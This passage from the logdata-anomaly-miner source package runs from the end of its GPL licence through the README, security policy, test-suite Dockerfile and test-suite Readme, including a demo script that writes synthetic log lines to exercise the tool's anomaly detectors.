mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . logdata-anomaly-miner-2.8.0/README.md000066400000000000000000000134161500476301700171710ustar00rootroot00000000000000# logdata-anomaly-miner [![Build Status](https://aecidjenkins.ait.ac.at/buildStatus/icon?job=AECID%2FAECID%2Flogdata-anomaly-miner%2Fmain)]( "https://aecidjenkins.ait.ac.at/job/AECID/job/AECID/job/logdata-anomaly-miner/job/main/") [![DeepSource](https://static.deepsource.io/deepsource-badge-light-mini.svg)](https://deepsource.io/gh/ait-aecid/logdata-anomaly-miner/?ref=repository-badge) This tool parses log data and allows to define analysis pipelines for anomaly detection. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. [![AECID Demo – Anomaly Detection with aminer and Reporting to IBM QRadar](https://img.youtube.com/vi/tL7KiMf8NfE/0.jpg)](https://www.youtube.com/watch?v=tL7KiMf8NfE) ## Requirements In order to install logdata-anomaly-miner a **Linux system** with **python >= 3.6** is required. All **Ubuntu** and **Debian** versions that we have in the tests are currently recommended. There is only experimental support for **Fedora**. More specifically the tested systems include Debian Buster, Debian Bullseye, Debian Bookworm, Ubuntu 20.04, Ubuntu 22.04, Fedora (docker image fedora:latest), and RedHat (docker image redhat/ubi9). _See [requirements.txt](https://github.com/ait-aecid/logdata-anomaly-miner/requirements.txt) for further module dependencies_ ## Installation ### Debian There are Debian packages for logdata-anomaly-miner in the official Debian/Ubuntu repositories. ``` apt-get update && apt-get install logdata-anomaly-miner ``` ### From source The following command will install the latest stable release: ``` cd $HOME wget https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/scripts/aminer_install.sh chmod +x aminer_install.sh ./aminer_install.sh ``` ### Docker For installation with Docker see: [Deployment with Docker](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker) ## Getting started Here are some resources to read in order to get started with configurations: * [Getting started](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Getting-started-(tutorial)) * [Some available configurations](https://github.com/ait-aecid/logdata-anomaly-miner/tree/main/source/root/etc/aminer/) * [Documentation](https://aeciddocs.ait.ac.at/logdata-anomaly-miner/) * [Wiki](https://github.com/ait-aecid/logdata-anomaly-miner/wiki) ## Publications Publications and talks: * Landauer M., Wurzenberger M., Skopik F., Hotwagner W., Höld G. (2023): [AMiner: A Modular Log Data Analysis Pipeline for Anomaly-based Intrusion Detection](https://dl.acm.org/doi/full/10.1145/3567675). [Digital Threats: Research and Practice](https://dl.acm.org/toc/dtrap/2023/4/1), Volume 4, Issue 1. March 2023, pp. 1–16, ACM. \[[PDF](https://dl.acm.org/doi/pdf/10.1145/3567675)\] * Wurzenberger M., Skopik F., Settanni G., Fiedler R. (2018): [AECID: A Self-learning Anomaly Detection Approach Based on Light-weight Log Parser Models](http://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0006643003860397). [4th International Conference on Information Systems Security and Privacy (ICISSP 2018)](http://www.icissp.org/), January 22-24, 2018, Funchal, Madeira - Portugal. INSTICC. \[[PDF](https://pdfs.semanticscholar.org/cd58/8e51d7a1d7f02f95ef2127623b21e2cd02c6.pdf)\] * Wurzenberger M., Landauer M., Skopik F., Kastner W. (2019): AECID-PG: [AECID-PG: A Tree-Based Log Parser Generator To Enable Log Analysis](https://ieeexplore.ieee.org/document/8717887). [4th IEEE/IFIP International Workshop on Analytics for Network and Service Management (AnNet 2019)](https://annet2019.moogsoft.com/) in conjunction with the [IFIP/IEEE International Symposium on Integrated Network Management (IM)](https://im2019.ieee-im.org/), April 8, 2019, Washington D.C., USA. IEEE. \[[PDF](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=8717887)\] * Landauer M., Skopik F., Wurzenberger M., Hotwagner W., Rauber A. (2019): [A Framework for Cyber Threat Intelligence Extraction from Raw Log Data](https://ieeexplore.ieee.org/document/9006328). [International Workshop on Big Data Analytics for Cyber Threat Hunting (CyberHunt 2019)](https://securitylab.no/cyberhunt2019/) in conjunction with the [IEEE International Conference on Big Data 2019](http://bigdataieee.org/BigData2019/), December 9-12, 2019, Los Angeles, CA, USA. IEEE. \[[PDF](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=9006328)\] A complete list of publications can be found at [https://aecid.ait.ac.at/further-information/](https://aecid.ait.ac.at/further-information/). ## Contribution We're happily taking patches and other contributions. Please see the following links for how to get started: * [ How to install a development environment ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Installing-a-development-environment) * [ Git development workflow ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow) ## Bugs If you encounter any bugs, please create an issue on [Github](https://github.com/ait-aecid/logdata-anomaly-miner/issues). ## Security If you discover any security-related issues read the [SECURITY.md](/SECURITY.md) first and report the issues. ## License [GPL-3.0](LICENSE) ## Financial Support This project received financial support through the research projects CAIS (832345), CIIS (840842), and CISA (850199) in course of the Austrian KIRAS security research programme, the research projects synERGY (855457) and DECEPT (873980) in course of the ICT of the future programme of the Austrian Research Promotion Agency (FFG), the research project PANDORA (SI2.835928) in course of the European Defence Industrial Development Programme (EDIDP), as well as the research projects ECOSSIAN (607577) and GUARD (833456) in course of the European Seventh Framework Programme (FP7) and Horizon 2020. logdata-anomaly-miner-2.8.0/SECURITY.md000066400000000000000000000033731500476301700175040ustar00rootroot00000000000000# Security Policy ## Supported Versions | Version | Supported | | ------- | ------------------ | | 2.x.x | :white_check_mark: | | < 2.0.0 | :x: | ## Reporting a Vulnerability Please email reports about any security related issues you find to aecid@ait.ac.at. This mail is delivered to a small developer team. Your email will be acknowledged within one business day, and you'll receive a more detailed response to your email within 7 days indicating the next steps in handling your report. Please use a descriptive subject line for your report email. After the initial reply to your report, our team will endeavor to keep you informed of the progress being made towards a fix and announcement. In addition, please include the following information along with your report: * Your name and affiliation (if any). * A description of the technical details of the vulnerabilities. It is very important to let us know how we can reproduce your findings. * An explanation who can exploit this vulnerability, and what they gain when doing so -- write an attack scenario. This will help us evaluate your report quickly, especially if the issue is complex. * Whether this vulnerability public or known to third parties. If it is, please provide details. * Whether we could mention your name in the changelogs. Once an issue is reported we use the following disclosure process: * When a report is received, we confirm the issue and determine its severity. * If we know of specific third-party services or software based on logdata-anomaly-miner that require mitigation before publication, those projects will be notified. * Fixes are prepared for the last minor release of the latest major release. * Patch releases are published for all fixed released versions. logdata-anomaly-miner-2.8.0/aecid-testsuite/000077500000000000000000000000001500476301700210015ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/Dockerfile000066400000000000000000000077111500476301700230010ustar00rootroot00000000000000# # PLEASE NOTE THAT YOUR WORKING-DIRECTORY MUST BE THE ROOT OF THIS REPOSITORY # IN ORDER WO BUILD THIS CONTAINER-IMAGE!!! # # Build: # docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:latest . # # Use: # docker run -m=2G --rm aecid/logdata-anomaly-miner-testing runUnittests # # Run all tests: # docker run -m=2G --rm aecid/logdata-anomaly-miner-testing ALL # # Run a shell inside the container: # docker run -m=2G -it --rm aecid/logdata-anomaly-miner-testing SHELL # # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite # # Pull base image. FROM debian:bookworm # allow the system to use two package managers (apt and pip), as we do it intentionally (needed since Debain Bookworm - see PEP 668 ENV PIP_BREAK_SYSTEM_PACKAGES=1 # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y --no-install-recommends apt-utils RUN apt-get update && apt-get install -y \ python3 \ python3-pip \ python3-bandit \ libacl1-dev \ postfix \ procps \ mailutils \ sudo \ curl \ vim \ postfix \ openjdk-17-jre \ locales \ locales-all \ rsyslog \ git \ wget RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \ sed -i -e 's/# de_AT ISO-8859-1/de_AT ISO-8859-1/' /etc/locale.gen && \ dpkg-reconfigure --frontend=noninteractive locales && \ update-locale LANG=en_US.UTF-8 ENV LANG=en_US.UTF-8 ENV LANGUAGE=en_US:en ENV LC_ALL=en_US.UTF-8 ADD . /home/aminer/logdata-anomaly-miner RUN cd /home/aminer/logdata-anomaly-miner && scripts/aminer_install.sh -b development -s /home/aminer/logdata-anomaly-miner # Copy logdata-anomaly-miner-sources ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner # copy these files instead as symlinks would need absolute paths. ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds2/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds ADD source/root/etc/aminer/conf-available/ait-lds2 /etc/aminer/conf-available/ait-lds2 ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic # Entrypoint-wrapper ADD scripts/aminerwrapper.sh /aminerwrapper.sh # Prepare the system and link all python-modules RUN chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \ && mkdir -p /var/lib/aminer/log && chmod 0755 /aminerwrapper.sh \ && chown aminer.aminer -R /var/lib/aminer && chmod 0755 /etc/aminer RUN PACK=$(find /usr/lib/python3/dist-packages -name posix1e.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE # Add config ADD source/root/etc/aminer /etc/aminer RUN chown aminer.aminer -R /home/aminer \ && ln -sf /usr/lib/logdata-anomaly-miner/aminer /home/aminer/logdata-anomaly-miner/aecid-testsuite/aminer \ && ln -s /etc/aminer/template_config.py /home/aminer/logdata-anomaly-miner/aecid-testsuite/demo/aminer/template_config.py \ && ln -s /etc/aminer/template_config.yml /home/aminer/logdata-anomaly-miner/aecid-testsuite/demo/aminer/template_config.yml \ && chmod +x /home/aminer/logdata-anomaly-miner/aecid-testsuite/*.sh \ && echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer ADD scripts/testingwrapper.sh /testingwrapper.sh ADD source /home/aminer/source ADD docs /home/aminer/docs RUN pip3 install flake8 pycodestyle vulture USER aminer WORKDIR /home/aminer/logdata-anomaly-miner/aecid-testsuite # The following volumes can be mounted VOLUME ["/etc/aminer","/var/lib/aminer","/logs"] ENTRYPOINT ["/testingwrapper.sh"] logdata-anomaly-miner-2.8.0/aecid-testsuite/Readme.md000066400000000000000000000537761500476301700225420ustar00rootroot00000000000000# aecid-testsuite This project includes all kinds of tests for *AECID* and *aminer*. We used Docker instances for testing (see: [How to use the aecid-testsuite](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite)). The aminer was successfully tested with all tests in **Ubuntu 20.04** and **Debian Bullseye**. In order to execute test classes the current path must be the *logdata-anomaly-miner* directory and the project structure must be as following: ## Guidelines for testing To provide the best quality of code possible we use the guidelines described in this chapter for all unittests. Before writing the unittests, a complete index should be created with all test cases for the component. This index must be reviewed with at least another person who knows the component. If the rules are followed, a reviewer should be able to see very clearly: * What is being tested? * Which INPUT is used for testing? * Which OUTPUT was expected? ### General Rules - Unittest classes must be named \Test.py - Parameter initialization: every test has to initialize it's own values to prevent unintentional changes in different test cases. - Input values must not be initialized in setup methods or as global variables. - It should be clear what input an unittest uses and what output is expected. - An unittest may only fullfill one case and no more. - Wherever possible, a test should only deliver an assert, unless the state that arises in the test is explicitly checked. - Unittests must fullfill following naming pattern (for every test class the numbering is reset): test\<#number of test\>\_\\_\ - Unittests must contain a description in form of a docstring in which the structure of the test, tested input value and expected output are described. - Unittests must not have any dependencies with each other and any global changes must be reset after every test case. Every test case must run independently from other tests. - Unittest cases must only contain the tested components and only necessary input values. - Cases must test only one component. Dependencies to other classes or handlers must be solved by dummy classes without functionality. - Test cases must be as short as possible. If test cases fail it should be clear what the error is. - Test code should be readable to be able to see the input and expected output values. - Tests should be as simple as possible. If this is not possible, we should think again about the structure of our code. This can be a clear indication that the code is not clear and simple. - Helper functions should also be tested separately. ### Rules for input values - All or as many as possible / meaningful parameters must be tested. If it is not possible to test all cases at least edge cases must be tested. - Correlations between parameters must be examined and combinations must be tested extensively. - Expected error cases must be tested. - All paths that lead to exceptions must be tested separately. - Different return values must also be tested. - Inputs must not be random or time based. Unittests must always lead to the same expected outputs. ## Unit-Tests ```logdata-anomaly-miner/ ├── aminer │ ├── __init__.py │ ├── AminerConfig.py │ ├── AnalysisChild.py │ ├── analysis │ ├── ... │ ├── events │ ├── ... │ ├── generic │ ├── ... │ ├── input │ ├── ... │ ├── parsing │ ├── ... │ ├── input │ ├── ... │ ├── util │ ├── ... ├── unit ├── __init__.py ├── analysis ├── __init__.py ├── AtomFiltersTest.py ├── EnhancedNewMatchPathValueComboDetectorTest.py ├── HistogramAnalysisTest.py ├── MatchValueAverageChangeDetectorTest.py ├── MatchValueStreamWriterTest.py ├── MissingMatchPathValueDetectorTest.py ├── NewMatchPathDetectorTest.py ├── NewMatchPathValueComboDetectorTest.py ├── NewMatchPathValueDetectorTest.py ├── RulesTest.py ├── TimestampCorrectionFiltersTest.py ├── TimestampsUnsortedDetectorTest.py ├── AllowlistViolationDetectorTest.py ├── ... ├── events ├── __init__.py ├── DefaultMailNotificationEventHandlerTest.py ├── StreamPrinterEventHandlerTest.py ├── SyslogWriterEventHandlerTest.py ├── UtilsTest.py ├── ... ├── generic ├── __init__.py ├── CronParsingModelTest.py ├── input ├── __init__.py ├── ByteStreamLineAtomizerTest.py ├── LogStreamTest.py ├── SimpleByteStreamLineAtomizerFactoryTest.py ├── SimpleMultisourceAtomSyncTest.py ├── SimpleUnparsedAtomHandlerTest.py ├── ... ├── testutilities ├── config.py ├── ... ├── parsing ├── __init__.py ├── AnyByteDataModelElementTest.py ├── DateTimeModelElementTest.py ├── DebugModelElementTest.py ├── DecimalFloatValueModelElementTest.py ├── DecimalIntegerValueModelElementTest.py ├── DelimitedDataModelElementTest.py ├── FirstMatchModelElementTest.py ├── FixedDataModelElementTest.py ├── FixedWordlistDataModelElementTest.py ├── HexStringModelElementTest.py ├── IpAddressDataModelElementTest.py ├── MatchElementTest.py ├── OptionalMatchModelElementTest.py ├── ParserMatchTest.py ├── RepeatedElementDataModelElementTest.py ├── SequenceModelElementTest.py ├── VariableByteDataModelElementTest.py ├── ... ├── util ├── __init__.py ├── JsonUtilTest.py ├── PersistenceUtilTest.py ├── SecureOSFunctionsTest.py ├── ... ``` Before starting any test case the path to the *config.py* should be changed. This can be achieved recursively by using following command (*/path/to/config.py* needs to be changed.): ``` sudo find . -type f -name "*Test.py" -print0 | xargs -0 sed -i -e 's#/home/user/Downloads/logdata-anomaly-miner-1.0.0/logdata-anomaly-miner/source/root/etc/aminer/config.py#/path/to/config.py#g' ``` Every test case can be executed by using following command in the main directory: ``` python3 -m unittest discover -s unit -p '*Test.py' ``` Single test classes can be executed with this command: ``` python3 -m unittest ``` for example: ``` python3 -m unittest unit/parsing/AnyByteDataModelElementTest.py ``` The created mails under */var/spool/mail/root* should be deleted. ## Integration Testing: To prepare every test the associated configuration file(s) first must be copied to */tmp*. The test-scripts **MUST NOT** be run as root. In addition, **declarations.sh** must be in the **same folder** as the integration test being run. Please note that the script needs root privileges for running the *aminer* and all **persistent data is deleted** from */tmp/lib/aminer*! ### Integration Test 1: In this integration test the learning phase of the aminer is tested. Multiple log-lines are used to be learned and checked. Some analysis components are used and all other lines are handled by the *SimpleUnparsedAtomHandler*. The Events are received by a *DefaultMailNotificationEventHandler* and a *StreamPrinterEventHandler*. Other lines are used to check if the pathes were learned and persisted in the persistence directory of the *aminer*. In this test case the *SubhandlerFilter* is suitable, because only one file, */tmp/syslog*, is monitored. Following command makes the script executeable: ``` sudo chmod +x aminerIntegrationTest.sh ``` **config.py** must be copied to */tmp/config.py*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest.sh ``` ### Integration Test 2: In this integration test multiple log files are used with the *SimpleMultisourceAtomSync*-handler with (*config22.py*) and without (*config21.py*) a defaultTimestampPath. Therefor the test is divided into two parts. The log lines all have different times and are distributed in */tmp/syslog* and */tmp/auth.log* and should be in the correct order while running the test. Also the consistency and correctness of the output from the receiveEvent-method is tested. The *analysis*-components are same with the first integration test. This test case also uses the *SyslogWriterEventHandler* and checks the output with the expected results. Following command makes the script executeable: ``` sudo chmod +x aminerIntegrationTest2.sh ``` **config21.py** and **config22.py** must be copied to */tmp/*. After all requirements have been met, the test can be run with the following command: ``` ./aminerIntegrationTest2.sh ``` ## Demo: The goal of this demo is to create a representative output of all the different *analysis*-components of the *aminer*. Every component has its own comment section, which starts with **:< /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $LOGFILE 2> /dev/null echo "Demo started.." echo "" FILE=/tmp/demo-config.py if ! test -f "$FILE"; then FILE=/tmp/demo-config.yml if ! test -f "$FILE"; then echo "$FILE does not exist!" exit 1 fi fi #start aminer sudo aminer --config "$FILE" & PID=$! #EventCorrelationDetector, NewMatchPathDetector #:<> $LOGFILE sleep 0.0001 done #Comment #EnhancedNewMatchPathValueComboDetector, NewMatchPathValueDetector, ModuloTimeMatchRule #:<> $LOGFILE done done #Comment #HistogramAnalysis, MatchFilter #:<> $LOGFILE t=`date +%s` done #PathDependentHistogramAnalysis sleep 0.5 echo "Generating data for the ModuloTimeBinDefinition histogram report.." startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+11` ]]; do R=`shuf -i 0-86400 -n 1` echo "Random: $R" >> $LOGFILE t=`date +%s` done #Comment #MatchValueAverageChangeDetector #:<> $LOGFILE t=`date +%s` done startTime=`date +%s` t=`date +%s` while [[ $t -lt `expr $startTime+1` ]]; do R=`shuf -i 300-1000 -n 1` echo $R >> $LOGFILE t=`date +%s` done #Comment #MatchValueStreamWriter #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #MissingMatchPathValueDetector, NewMatchPathDetector #:<> $LOGFILE sleep 3 #MissingMatchPathValue expected echo second echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 0.5 #No output expected echo third echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE sleep 4 #MissingMatchPathValue expected echo fourth echo " Current Disk Data is: Filesystem Type Size Used Avail Use% dd%" >> $LOGFILE #Comment #NewMatchPathValueComboDetector, NewMatchPathValueDetector #:<> $LOGFILE t=`date +%s` sleep 0.25 done #Comment #NewMatchIdValueComboDetector #:<> $LOGFILE echo 'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE # StringRegexMatchRule echo 'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=no exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)' >> $LOGFILE #Comment #TimeCorrelationDetector #At least 3000 lines must be passed to trigger the TimeCorrelationDetector. #TimeCorrelationViolationDetector #The input text is saying that the time between cron job announcement and execution is 5 minutes, but in reality it is 5 seconds for more convenience. #:<> $LOGFILE sleep 4 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #wrong Job Number ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50001]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #expected time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 5 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #too long time difference ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Will run job \`cron.daily' in 5 min." | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 7 ({ date '+%Y-%m-%d %T ' && cat /etc/hostname && echo " cron[50000]: Job \`cron.daily' started" | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE sleep 10 #Comment # AllowlistRules, AllowlistViolationDetector #:<> $LOGFILE echo "User root logged in" >> $LOGFILE who | awk '{print $1,$3,$4}' | while read user time; do \ echo User $user logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago.>> $LOGFILE echo User root logged in $(($(($(date +%s) - $(date -d "$time" +%s)))/60)) minutes ago. >> $LOGFILE; done #Comment #:<> $LOGFILE # AnyByteDataModelElement echo "Any:dafsdff12%3§fasß?–_=yy" >> $LOGFILE echo "Any:äöüß" >> $LOGFILE # Base64StringModelElement echo "VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg==" >> $LOGFILE # DateTimeModelElement ({ echo "Current DateTime: " && date '+%d.%m.%Y %T' | tr -d "\n"; } | tr -d "\n" && echo "") >> $LOGFILE # DecimalFloatValueModelElement echo "-25878952156245.222239655488955" >> $LOGFILE # DecimalIntegerValueModelElement echo "- 3695465546654" >> $LOGFILE # DelimitedDataModelElement echo "This is some part of a csv file;" >> $LOGFILE # ElementValueBranchModelElement echo "match data: 25000" >> $LOGFILE # HexStringModelElement echo "b654686973206973206a7573742061206e6f726d616c2074657874" >> $LOGFILE # IpAddressModelElement echo "Gateway IP-Address: 192.168.128.225" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.8.8" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueListMatchRule echo "Gateway IP-Address: 8.8.4.4" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 10.0.0.0" >> $LOGFILE # IPv4InRFC1918MatchRule, ValueRangeMatchRule echo "Gateway IP-Address: 11.0.0.0" >> $LOGFILE # MultiLocaleDateTimeModelElement echo "Feb 25 2019" >> $LOGFILE # OptionalMatchModelElement echo "The-searched-element-was-found!" >> $LOGFILE # RepeatedElementDataModelElement for i in {1..5}; do R=`shuf -i 1-45 -n 1` echo "[drawn number]: $R" | tr -d "\n" >> $LOGFILE done echo "" >> $LOGFILE # VariableByteDataModelElement echo "---------------------------------------------------------------------" >> $LOGFILE # WhiteSpaceLimitedDataModelElement alphabet="abcdefghijklmnopqrstuvwxyz " text="z" for i in {1..1000}; do R=`shuf -i 0-26 -n 1` text=$text${alphabet:R:1} if [ $R -eq 26 ]; then break fi done echo "$text" >> $LOGFILE 